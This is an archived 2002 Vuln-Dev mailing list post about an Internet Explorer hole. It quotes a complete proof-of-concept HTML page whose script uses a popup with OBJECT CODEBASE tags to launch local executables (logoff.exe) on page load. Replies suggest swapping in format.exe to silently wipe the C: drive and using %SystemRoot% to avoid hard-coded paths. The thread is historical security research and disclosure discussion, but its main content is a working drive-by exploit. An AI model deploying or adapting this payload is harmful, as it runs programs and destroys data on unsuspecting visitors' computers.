Vulnerability Development mailing list archives
RE: Rather large MSIE-hole
From: "Jim Harrison (SPG)" <jmharr () microsoft com>
Date: Wed, 13 Mar 2002 11:58:30 -0800
While it's certainly true that you can hard-code any path you want to any normally-benign executable on the system, any hacker worth their salt would know how to get and use Windows system variables to make the system cooperate in its own self-destruction. For instance, "%SystemRoot%" would eliminate the need for "C:\windows" * Jim Harrison MCP(NT4, 2K), A+, Network+ -----Original Message----- From: NyQuist [mailto:nyquist () ntlworld com] Sent: Wednesday, March 13, 2002 12:46 AM To: Magnus Bodin Cc: Vuln-Dev Subject: Re: Rather large MSIE-hole If this is confirmed, could this array by changed to equal, erm...let's say format.exe (with a couple of parameters to silently format C:/)? var programName=new Array( 'c:/windows/system32/logoff.exe', 'c:/winxp/system32/logoff.exe', 'c:/winnt/system32/logoff.exe' On Wed, 2002-03-13 at 06:06, Magnus Bodin wrote:
On Tue, Mar 12, 2002 at 11:32:20AM +0100, Magnus Bodin wrote:The latest MSIE-hole is now spreading.Sorry. Something broke there with the inclusion of the code. I've not done any large scale testing of this a part from getting reports from a lot of friends and colleagues that they are vulnerable still after running windows update. Here it is, comlete with all the pop-up-code: --%< cut here----- <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML> <HEAD> <TITLE>IE6 security...</TITLE> <META http-equiv=Content-Type content="text/html; charset=windows-1252"> <SCRIPT language=JScript> var programName=new Array( 'c:/windows/system32/logoff.exe', 'c:/winxp/system32/logoff.exe', 'c:/winnt/system32/logoff.exe' ); function Init(){ var oPopup=window.createPopup(); var oPopBody=oPopup.document.body; var n,html=''; for(n=0;n<programName.length;n++) html+="<OBJECT NAME='X'
CLASSID='CLSID:11111111-1111-1111-1111-111111111111' CODEBASE='"+programName[n]+"' %1='r'></OBJECT>";
oPopBody.innerHTML=html; oPopup.show(290, 390, 200, 200, document.body); } </SCRIPT> </head> <BODY onload="Init()"> You should feel lucky if you dont have XP right now. </BODY> </HTML> --%< cut here----- -- magnus MICROS~1 BOB was written in Lisp.
http://x42.com/
-- NyQuist | Matthew Hall -- NyQuist at ntlworld dot com -- http://NyQuist.port5.com Sig: #define QUESTION ((bb) || !(bb)) ubKey : 649779B0 (certserver.pgp.com)
Current thread:
- Re: Rather large MSIE-hole, (continued)
- Re: Rather large MSIE-hole NyQuist (Mar 13)
- Re: Rather large MSIE-hole NoCoNFLiC (Mar 13)
- Re: Rather large MSIE-hole methodic (Mar 14)
- Re: Rather large MSIE-hole Felipe Franciosi (Mar 14)
- Re: Rather large MSIE-hole KF (Mar 14)
- Re: Rather large MSIE-hole jon schatz (Mar 14)
- Re: Rather large MSIE-hole NoCoNFLiC (Mar 15)
- Re: Rather large MSIE-hole NyQuist (Mar 13)
- Re: [Re: Rather large MSIE-hole] another variant (NAV and Finjan block this) David Barnett (Mar 16)
- Re: Rather large MSIE-hole Raul Dias (Mar 13)
- Re: Rather large MSIE-hole Syzop (Mar 14)
- RE: Rather large MSIE-hole Ryan Sweat (Mar 14)
- Re: Rather large MSIE-hole Keegan (Mar 14)
- Re: Rather large MSIE-hole KF (Mar 14)